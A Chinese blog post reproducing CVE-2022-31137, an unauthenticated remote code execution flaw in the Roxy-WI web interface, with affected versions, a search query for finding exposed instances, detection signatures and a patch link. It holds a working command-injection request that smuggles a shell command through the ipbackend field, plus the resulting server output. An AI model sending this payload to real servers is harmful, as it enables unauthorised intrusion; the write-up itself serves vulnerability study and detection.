-
CVE-2022-31137 Roxy-WI未经身份验证的远程代码执行漏洞复现
目录
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Roxy-WI是开源的一款用于管理 Haproxy、Nginx 和 Keepalived 服务器的 Web 界面。
0x03 漏洞概述:
Roxy-WI 6.1.1.0 之前的版本存在安全漏洞,该漏洞源于系统命令可以通过 subprocess_execute 函数远程运行,远程攻击者利用该漏洞可以执行远程代码。
0x04 影响版本:
Roxy-WI < 6.1.1.0
0x05 环境搭建:
搭建过程太过艰苦,搭建了3天依旧在报错。
(只能fofa去搜索了,后期搭建完后,补充搭建过程。)
app="HAProxy-WI"
0x06 漏洞复现:
Burp改包:
POST /app/options.py
alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
0x07 流量分析:
特征:
客户端:
url:
POST /app/options.py
data:
alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
服务端:
data:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0x08 修复建议:
目前厂商已发布升级了Roxy-WI 安全漏洞的补丁,Roxy-WI 安全漏洞的补丁获取链接:
https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532
-
相关阅读:
〖Python 数据库开发实战 - MySQL篇⑳〗- 数据表的内连接
Android JNI HIDL 简单实例学习
深度学习实战:用Keras搭建深度学习网络做手写数字识别
c# 定时器
使用开源ros包实现导航功能(一)
Substrate 技术及生态 8 月大事记 | 波卡发布新版本,XCM 协议更新
网络安全(黑客)自学
base64编码的原理
vue2中的props属性
小码农也有大目标,最新BAT大厂Java面试总结
- 原文地址:https://blog.csdn.net/qq_44281295/article/details/127770040